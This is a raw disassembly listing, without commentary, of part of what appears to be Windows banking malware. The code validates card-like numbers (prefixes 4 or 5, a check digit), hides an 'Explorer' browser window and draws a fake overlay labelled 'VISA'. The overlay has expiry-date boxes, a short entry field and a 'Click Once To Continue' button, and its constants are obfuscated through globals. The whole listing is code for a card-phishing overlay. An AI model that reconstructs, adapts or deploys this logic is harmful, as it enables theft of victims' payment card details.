push 0
movsx eax, word_44B140
movsx edx, word_44B0E0
add eax, edx
sub eax, 0Fh
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
movsx eax, word_44B140
sub eax, 6
push eax
lea eax, [ebp+var_267]
push eax
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
pop edi
pop esi
leave
retn
sub_43E013 endp
; =============== S U B R O U T I N E =======================================
sub_43E0F8 proc near ; CODE XREF: sub_441E11+262�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
movsx eax, word_44B130
movsx edx, word_44B0CC
add eax, edx
sub eax, 4
cmp ecx, eax
jge short loc_43E14C
mov eax, dword_44B0B0
add eax, dword_44B0FC
sub eax, 3
imul ecx, eax
mov eax, dword_44B0D0
lea eax, [eax+eax+1]
mov edx, esi
add edx, eax
mov eax, dword_44B144
add eax, 3
add eax, dword_44B0BC
imul edx, eax
sub ecx, edx
jmp loc_43E295
; ---------------------------------------------------------------------------
loc_43E14C: ; CODE XREF: sub_43E0F8+1C�j
dec ecx
mov eax, dword_44B0DC
add eax, 0Ch
cmp ecx, eax
jge short loc_43E18B
movsx eax, word_44B120
movsx edx, word_44B090
add eax, edx
sub eax, 8
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, dword_44B098
add edx, 5
add edx, dword_44B0D8
mov ecx, eax
sub ecx, edx
jmp loc_43E295
; ---------------------------------------------------------------------------
loc_43E18B: ; CODE XREF: sub_43E0F8+5F�j
dec ecx
mov eax, dword_44B100
add eax, 1Fh
cmp ecx, eax
jge short loc_43E1BF
movsx eax, word_44B114
movsx edx, word_44B090
add eax, edx
sub eax, 2
imul ecx, eax
movsx eax, word_44B0CC
add eax, 3Bh
sub ecx, eax
jmp loc_43E295
; ---------------------------------------------------------------------------
loc_43E1BF: ; CODE XREF: sub_43E0F8+9E�j
dec ecx
mov eax, dword_44B148
add eax, 20h
add eax, dword_44B104
cmp ecx, eax
jge short loc_43E1F4
movsx eax, word_44B11C
add eax, dword_44B0C4
sub eax, 4
imul ecx, eax
mov eax, dword_44B0D8
add eax, 43h
sub ecx, eax
jmp loc_43E295
; ---------------------------------------------------------------------------
loc_43E1F4: ; CODE XREF: sub_43E0F8+D8�j
dec ecx
mov eax, dword_44B10C
add eax, 29h
cmp ecx, eax
jge short loc_43E227
mov eax, dword_44B0FC
add eax, dword_44B0AC
sub eax, 3
imul ecx, eax
mov eax, dword_44B110
add eax, 47h
movsx edx, word_44B108
add eax, edx
sub ecx, eax
jmp short loc_43E295
; ---------------------------------------------------------------------------
loc_43E227: ; CODE XREF: sub_43E0F8+107�j
dec ecx
mov eax, dword_44B0D4
add eax, 36h
cmp ecx, eax
jge short loc_43E24F
mov eax, dword_44B0C0
dec eax
imul ecx, eax
mov eax, dword_44B0C0
add eax, 64h
add eax, dword_44B100
sub ecx, eax
jmp short loc_43E295
; ---------------------------------------------------------------------------
loc_43E24F: ; CODE XREF: sub_43E0F8+13A�j
dec ecx
movsx eax, word_44B0A4
movsx edx, word_44B0CC
lea eax, [eax+edx+2Dh]
cmp ecx, eax
jge short loc_43E289
mov eax, dword_44B094
add eax, dword_44B0A8
sub eax, 2
imul ecx, eax
mov eax, dword_44B0C4
add eax, 69h
add eax, dword_44B100
sub ecx, eax
jmp short loc_43E295
; ---------------------------------------------------------------------------
loc_43E289: ; CODE XREF: sub_43E0F8+16C�j
movsx eax, word_44B130
add eax, 35h
sub ecx, eax
loc_43E295: ; CODE XREF: sub_43E0F8+4F�j
; sub_43E0F8+8E�j ...
mov eax, ecx
pop esi
retn
sub_43E0F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E299 proc near ; DATA XREF: .data:0044B218�o
push ebp
mov ebp, esp
push offset dword_44A784
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_44A784
pop ebp
retn 4
sub_43E299 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E2B0 proc near ; CODE XREF: sub_43A503+BB3�p
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2BE = byte ptr -2BEh
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_106 = byte ptr -106h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_F8 = byte ptr -0F8h
var_F3 = byte ptr -0F3h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_43F204
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_43E2D7
cmp al, 35h
jnz loc_43F204
loc_43E2D7: ; CODE XREF: sub_43E2B0+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43E2DF: ; CODE XREF: sub_43E2B0+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E2DF
mov [ebp+var_128], eax
movsx edx, word_44B0B8
mov ecx, dword_44B09C
lea edx, [edx+ecx+0Bh]
cmp eax, edx
jz short loc_43E312
mov edx, dword_44B094
add edx, 13h
cmp eax, edx
jnz loc_43F204
loc_43E312: ; CODE XREF: sub_43E2B0+4F�j
mov eax, dword_44B0B0
mov ebx, eax
add ebx, dword_44B0C0
sub ebx, 8
jmp short loc_43E348
; ---------------------------------------------------------------------------
loc_43E324: ; CODE XREF: sub_43E2B0+AB�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:dword_448370[edx], eax
jz loc_43F204
inc ebx
loc_43E348: ; CODE XREF: sub_43E2B0+72�j
mov eax, dword_44B0E8
add eax, 5Ah
movsx edx, word_44B12C
add eax, edx
cmp ebx, eax
jb short loc_43E324
mov eax, dword_44B148
add eax, 0Eh
add eax, dword_44B0D8
cmp [ebp+var_128], eax
jnz loc_43E54F
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_43E389
cmp al, 20h
jnz loc_43F204
loc_43E389: ; CODE XREF: sub_43E2B0+CF�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_43E39B
cmp al, 20h
jnz loc_43F204
loc_43E39B: ; CODE XREF: sub_43E2B0+E1�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_43E3AD
cmp al, 20h
jnz loc_43F204
loc_43E3AD: ; CODE XREF: sub_43E2B0+F3�j
mov eax, dword_44B0D4
movsx edx, word_44B0F0
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, dword_44B0C0
add eax, dword_44B0B0
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov [ebp+eax+var_106], dl
movsx eax, word_44B130
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov byte ptr [ebp+eax+var_102+1], dl
mov eax, dword_44B0EC
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_FC], dl
mov eax, dword_44B138
add eax, dword_44B0A8
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov byte ptr [ebp+eax+var_102+1], dl
movsx eax, word_44B0F0
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_FF], dl
movsx eax, word_44B114
add eax, dword_44B098
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov byte ptr [ebp+eax+var_102+1], dl
mov eax, dword_44B0BC
add eax, 6
movsx edx, word_44B0F4
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FF], dl
movsx eax, word_44B0A4
add eax, dword_44B110
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_104], dl
mov eax, dword_44B124
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_F8], dl
mov eax, dword_44B0C0
add eax, 7
add eax, dword_44B094
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
mov eax, dword_44B100
add eax, 2
movsx edx, word_44B0E4
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, dword_44B110
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FB], dl
mov eax, dword_44B0FC
add eax, 5
movsx edx, word_44B0F0
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44B0DC
movsx edx, word_44B140
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_100], dl
mov eax, dword_44B10C
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_F3], dl
movsx eax, word_44B0A0
mov edx, dword_44B0C0
lea eax, [eax+edx+8]
movsx edx, word_44B13C
sub edx, 7
mov [ebp+eax+var_FF], dl
jmp short loc_43E55E
; ---------------------------------------------------------------------------
loc_43E54F: ; CODE XREF: sub_43E2B0+C1�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_444C90
loc_43E55E: ; CODE XREF: sub_43E2B0+29D�j
movsx esi, word_44B0F4
jmp short loc_43E57C
; ---------------------------------------------------------------------------
loc_43E567: ; CODE XREF: sub_43E2B0+2DF�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_43E576
cmp al, 39h
jle short loc_43E57B
loc_43E576: ; CODE XREF: sub_43E2B0+2C0�j
jmp loc_43F204
; ---------------------------------------------------------------------------
loc_43E57B: ; CODE XREF: sub_43E2B0+2C4�j
inc esi
loc_43E57C: ; CODE XREF: sub_43E2B0+2B5�j
mov eax, dword_44B138
add eax, 7
movsx edx, word_44B0CC
add eax, edx
cmp esi, eax
jb short loc_43E567
mov eax, dword_44B0DC
sub eax, 8
mov [ebp-108h], eax
mov eax, dword_44B0C4
movsx edx, word_44B118
mov esi, eax
add esi, edx
sub esi, 0Dh
jmp short loc_43E5F9
; ---------------------------------------------------------------------------
loc_43E5B4: ; CODE XREF: sub_43E2B0+35D�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
mov edx, dword_44B128
add edx, 2
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_43E5E9
mov eax, dword_44B0BC
add eax, 8
sub [ebp-108h], eax
loc_43E5E9: ; CODE XREF: sub_43E2B0+329�j
mov eax, dword_44B0C4
add eax, dword_44B138
sub eax, 4
add esi, eax
loc_43E5F9: ; CODE XREF: sub_43E2B0+302�j
movsx eax, word_44B0B8
movsx edx, word_44B0B4
lea eax, [eax+edx+9]
cmp esi, eax
jb short loc_43E5B4
mov eax, dword_44B0E8
movsx edx, word_44B0B8
mov ebx, eax
add ebx, edx
sub ebx, 7
jmp short loc_43E641
; ---------------------------------------------------------------------------
loc_43E624: ; CODE XREF: sub_43E2B0+3A5�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
movsx eax, word_44B0E4
sub eax, 4
add ebx, eax
loc_43E641: ; CODE XREF: sub_43E2B0+372�j
movsx eax, word_44B118
movsx edx, word_44B108
lea eax, [eax+edx+2]
cmp ebx, eax
jb short loc_43E624
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
mov edi, dword_44B148
sub edi, 2
cmp edx, edi
jnz loc_43F204
lea eax, [ebp+var_FF]
push eax
call ds:dword_44A774
pop ecx
or eax, eax
jnz loc_43F204
mov eax, dword_44B0FC
mov esi, eax
add esi, dword_44B104
sub esi, 5
movsx eax, word_44B12C
mov esi, eax
add esi, dword_44B0DC
sub esi, 0Ch
jmp short loc_43E6C9
; ---------------------------------------------------------------------------
loc_43E6B1: ; CODE XREF: sub_43E2B0+423�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp ds:dword_448370[eax], 0
jz short loc_43E6D5
inc esi
loc_43E6C9: ; CODE XREF: sub_43E2B0+3FF�j
mov eax, dword_44B0EC
add eax, 64h
cmp esi, eax
jb short loc_43E6B1
loc_43E6D5: ; CODE XREF: sub_43E2B0+416�j
movsx eax, word_44B0F0
add eax, 5Fh
cmp esi, eax
jz loc_43F204
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:dword_448370[edx], eax
push offset dword_44C5C8
call sub_43DF30
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call ds:dword_44A638 ; FindWindowExA
mov [ebp+var_134], eax
test eax, eax
jnz short loc_43E730
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_43E730: ; CODE XREF: sub_43E2B0+475�j
push offset asc_44C5BB ; "\t"
call sub_43DF30
push eax
push [ebp+var_134]
call sub_43F984
mov [ebp+var_12C], eax
push offset aExplorer ; "Explorer"
push eax
call sub_43F984
add esp, 14h
mov [ebp+var_26C], eax
mov eax, 30h
mul esi
mov [ebp+var_270], eax
mov edi, [ebp+var_26C]
mov ebx, eax
mov ds:dword_448374[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_274], eax
push ds:dword_448374[eax]
call ds:dword_44A658 ; ShowWindow
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call ds:dword_44A650 ; GetWindowRect
push 0
call ds:dword_4475E8 ; GetModuleHandleA
mov [ebp+var_10C], eax
push 0
push eax
push 0
push [ebp+var_12C]
mov eax, [ebp+var_110]
sub eax, [ebp+var_118]
push eax
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
push eax
movsx eax, word_44B13C
add eax, dword_44B104
sub eax, 9
push eax
mov eax, dword_44B0DC
sub eax, 8
push eax
push 50800000h
lea eax, [ebp+var_FF]
push eax
push offset aKkqVx ; "kkq-vx"
push 200h
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_278], eax
mov eax, 30h
mul esi
mov [ebp+var_27C], eax
mov edi, [ebp+var_278]
mov ebx, eax
mov ds:dword_448378[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word_44B140
add ebx, 0F3h
sub edi, ebx
movsx ebx, word_44B114
add ebx, 39h
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, dword_44B0C4
movsx edx, word_44B11C
add eax, edx
sub eax, 6
cmp [ebp+var_124], eax
jge short loc_43E897
mov eax, dword_44B0B0
sub eax, 4
mov [ebp+var_124], eax
loc_43E897: ; CODE XREF: sub_43E2B0+5D7�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word_44B130
add edx, 29h
sub eax, edx
mov [ebp+var_120], eax
push offset byte_44C5A1
call sub_43DF30
mov [ebp+var_280], eax
push offset dword_44C588
call sub_43DF30
mov [ebp+var_284], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_288], eax
mov edi, eax
push ds:dword_448378[edi]
movsx edi, word_44B114
add edi, 39h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word_44B14C
add edi, 10h
push edi
push 50800000h
mov edi, [ebp+var_284]
push edi
mov edi, [ebp+var_280]
push edi
mov edi, dword_44B128
add edi, dword_44B0DC
sub edi, 8
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_138], eax
push offset word_44C57E
call sub_43DF30
mov [ebp+var_28C], eax
push offset word_44C57A
call sub_43DF30
add esp, 10h
mov [ebp+var_290], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov edi, eax
push ds:dword_448378[edi]
mov edi, dword_44B104
add edi, 0F8h
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, dword_44B0BC
add ebx, 36h
movsx edx, word_44B0F0
add ebx, edx
add edi, ebx
mov ebx, dword_44B100
add ebx, dword_44B0D4
sub ebx, 2
add edi, ebx
push edi
mov edi, dword_44B110
add edi, 9
movsx ebx, word_44B114
add edi, ebx
push edi
push 50800009h
mov edi, [ebp+var_290]
push edi
mov edi, [ebp+var_28C]
push edi
mov edi, dword_44B0D8
movsx ebx, word_44B108
add edi, ebx
sub edi, 8
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, dword_44B124
sub eax, 2
push eax
movsx eax, word_44B0E4
mov edx, eax
add edx, dword_44B10C
sub edx, 9
push edx
sub eax, 6
push eax
push 2BCh
mov eax, dword_44B0E8
sub eax, 6
push eax
movsx eax, word_44B118
add eax, dword_44B0F8
sub eax, 10h
push eax
movsx eax, word_44B090
add eax, 6
push eax
movsx eax, word_44B114
add eax, 11h
push eax
call ds:dword_448250 ; CreateFontA
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call ds:dword_445014 ; SendMessageA
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
mov eax, dword_44B138
add eax, 0F8h
mov edx, dword_44B0D0
add edx, 4
sub eax, edx
push eax
mov eax, [ebp+var_120]
movsx edx, word_44B114
movsx ecx, word_44B0E0
add edx, ecx
sub edx, 7
sub eax, edx
push eax
mov eax, dword_44B094
add eax, dword_44B0AC
dec eax
push eax
mov eax, dword_44B128
inc eax
push eax
push 50000000h
push offset asc_44C571 ; " "
push offset aStatic ; "STATIC"
mov eax, dword_44B148
sub eax, 2
push eax
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_298], eax
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, [ebp+var_298]
mov ebx, eax
mov ds:dword_44837C[ebx], edi
mov eax, dword_44B144
add eax, dword_44B100
cmp byte ptr [ebp+eax+var_102], 34h
jnz short loc_43EB49
push offset aVisa ; "VISA"
lea eax, [ebp+var_253]
push eax
call sub_444C90
jmp short loc_43EB61
; ---------------------------------------------------------------------------
loc_43EB49: ; CODE XREF: sub_43E2B0+884�j
push offset word_44C55E
call sub_43DF30
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_444C90
loc_43EB61: ; CODE XREF: sub_43E2B0+897�j
push offset aN ; "n"
call sub_43DF30
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call ds:dword_44A634
push offset word_44C4E2
call sub_43DF30
add esp, 18h
mov [ebp+var_2A0], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A4], eax
mov edi, eax
push ds:dword_44837C[edi]
mov edi, dword_44B104
add edi, 26h
add edi, dword_44B0DC
push edi
push [ebp+var_120]
mov edi, dword_44B0EC
lea edi, [edi+edi+0Ah]
push edi
movsx edi, word_44B0B4
add edi, 5
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, dword_44B0E8
movsx ebx, word_44B114
add edi, ebx
sub edi, 9
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
movsx eax, word_44B0B4
add eax, dword_44B138
sub eax, 7
push eax
movsx eax, word_44B140
sub eax, 7
push eax
mov edx, dword_44B134
movsx ecx, word_44B0A0
add edx, ecx
sub edx, 9
push edx
push 190h
push eax
mov eax, dword_44B124
mov edx, eax
sub edx, 2
push edx
movsx edx, word_44B0E4
push edx
mov edx, dword_44B0DC
lea eax, [eax+edx+6]
push eax
call ds:dword_448250 ; CreateFontA
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call ds:dword_445014 ; SendMessageA
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov [ebp+var_2AC], eax
push ds:dword_44837C[eax]
mov edx, dword_44B104
add edx, 126h
add edx, dword_44B134
push edx
mov edx, dword_44B144
add edx, 2Ah
add edx, dword_44B110
push edx
mov edx, dword_44B0D0
add edx, 4Bh
push edx
movsx edx, word_44B0B4
add edx, 5
push edx
push 50800003h
push offset byte_44C4D8
push offset aCombobox ; "COMBOBOX"
mov edx, dword_44B0AC
add edx, dword_44B0BC
sub edx, 3
push edx
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2AC]
mov ds:dword_448380[edi], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B0], eax
mov [ebp+var_2B4], eax
push ds:dword_44837C[eax]
mov edx, dword_44B0FC
add edx, 126h
add edx, dword_44B0D8
push edx
movsx edx, word_44B0A0
add edx, 37h
push edx
mov edx, dword_44B0AC
add edx, 49h
push edx
movsx edx, word_44B108
add edx, 41h
push edx
push 50800003h
push offset byte_44C4D8
push offset aCombobox ; "COMBOBOX"
mov edx, dword_44B0BC
dec edx
push edx
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2B4]
mov ds:dword_448384[edi], eax
mov eax, dword_44B0BC
add eax, dword_44B124
sub eax, 2
mov [ebp+var_102], ax
jmp loc_43EE76
; ---------------------------------------------------------------------------
loc_43EDBD: ; CODE XREF: sub_43E2B0+BDE�j
push offset dword_44C4D0
call sub_43DF30
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call ds:dword_44A634
lea eax, [ebp+var_2BE]
push eax
mov eax, dword_44B148
sub eax, 2
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C4], eax
push ds:dword_448380[eax]
call ds:dword_445014 ; SendMessageA
push offset word_44C4C6
call sub_43DF30
movzx edi, [ebp+var_102]
mov ebx, dword_44B104
inc ebx
add ebx, dword_44B10C
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2BE]
push edi
call ds:dword_44A634
add esp, 20h
lea eax, [ebp+var_2BE]
push eax
movsx eax, word_44B0A4
sub eax, 5
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2C8], eax
push ds:dword_448384[eax]
call ds:dword_445014 ; SendMessageA
inc [ebp+var_102]
loc_43EE76: ; CODE XREF: sub_43E2B0+B08�j
movzx eax, [ebp+var_102]
mov edx, dword_44B0DC
add edx, 2
add edx, dword_44B10C
cmp eax, edx
jl loc_43EDBD
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov [ebp+var_2BC], eax
push ds:dword_44837C[eax]
movsx edx, word_44B0F0
movsx ecx, word_44B0A4
lea edx, [edx+ecx+0Eh]
push edx
movsx edx, word_44B14C
mov ecx, edx
add ecx, 51h
push ecx
mov ecx, dword_44B104
add ecx, 7Ah
push ecx
add edx, 2Bh
push edx
push 50800000h
push offset byte_44C4D8
push offset aEdit ; "EDIT"
push 200h
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2BC]
mov ds:dword_448388[edi], eax
mov eax, dword_44B0EC
add eax, dword_44B0B0
sub eax, 5
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp-2C0h], eax
push ds:dword_448388[eax]
call ds:dword_445014 ; SendMessageA
push offset byte_44C4B7
call sub_43DF30
mov [ebp+var_2C4], eax
push offset byte_44C495
call sub_43DF30
add esp, 8
mov [ebp+var_2C8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov edi, eax
push ds:dword_44837C[edi]
movsx edi, word_44B114
add edi, 3Dh
push edi
push [ebp+var_120]
mov edi, dword_44B10C
add edi, 4Ch
push edi
movsx edi, word_44B11C
mov ebx, dword_44B0E8
lea edi, [edi+ebx+8Eh]
push edi
push 50000000h
mov edi, [ebp+var_2C8]
push edi
mov edi, [ebp+var_2C4]
push edi
movsx edi, word_44B0E0
sub edi, 8
push edi
call ds:dword_449648 ; CreateWindowExA
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call ds:dword_445014 ; SendMessageA
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
mov [ebp+var_2D4], eax
push ds:dword_44837C[eax]
movsx edx, word_44B12C
add edx, 13h
push edx
mov edx, dword_44B0A8
add edx, 92h
movsx ecx, word_44B0A0
add edx, ecx
push edx
mov edx, dword_44B144
add edx, 0FAh
add edx, dword_44B094
mov ecx, dword_44B100
add ecx, 20h
sub edx, ecx
push edx
mov edx, dword_44B0C0
add edx, 2
add edx, dword_44B098
push edx
push 50800000h
push offset aClickOnceToCon ; "Click Once To Continue"
push offset aButton ; "BUTTON"
push dword_44B0D0
call ds:dword_449648 ; CreateWindowExA
mov edi, [ebp+var_2D4]
mov ds:dword_44838C[edi], eax
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2D8], eax
push ds:dword_44838C[eax]
call ds:dword_445014 ; SendMessageA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov [ebp+var_2E0], eax
push ds:dword_448380[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2E0]
mov ds:dword_448390[edi], eax
push offset sub_43CBF8
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E4], eax
push ds:dword_448380[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov [ebp+var_2EC], eax
push ds:dword_448384[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2EC]
mov ds:dword_448394[edi], eax
push offset sub_43CBF8
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F0], eax
push ds:dword_448384[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push ds:dword_448388[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_2F8]
mov ds:dword_448398[edi], eax
push offset sub_43CBF8
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push ds:dword_448388[eax]
call ds:dword_4475F8 ; SetWindowLongA
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push ds:dword_44837C[eax]
call ds:dword_44A628 ; GetWindowLongA
mov edi, [ebp+var_304]
mov ds:dword_44839C[edi], eax
push offset sub_43CBF8
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push ds:dword_44837C[eax]
call ds:dword_4475F8 ; SetWindowLongA
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
push ds:dword_448380[eax]
call ds:dword_447A40 ; SetFocus
loc_43F204: ; CODE XREF: sub_43E2B0+10�j
; sub_43E2B0+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43E2B0 endp
; =============== S U B R O U T I N E =======================================
sub_43F209 proc near ; DATA XREF: .data:0044B244�o
mov eax, 80004001h
retn 10h
sub_43F209 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43F211 proc near ; DATA XREF: sub_43D966+109�o
push ebp
mov ebp, esp
loc_43F214: ; CODE XREF: sub_43F211+2B�j
mov eax, dword_44B100
sub eax, 3
push eax
call ds:dword_44A630
pop ecx
movsx eax, word_44B0E0
sub eax, 8
push eax
push offset sub_43C941
push 0
call ds:dword_445048 ; EnumDesktopWindows
jmp short loc_43F214
sub_43F211 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F242 proc near ; CODE XREF: sub_43DCAC+AA�p
; sub_43DCAC+16E�p
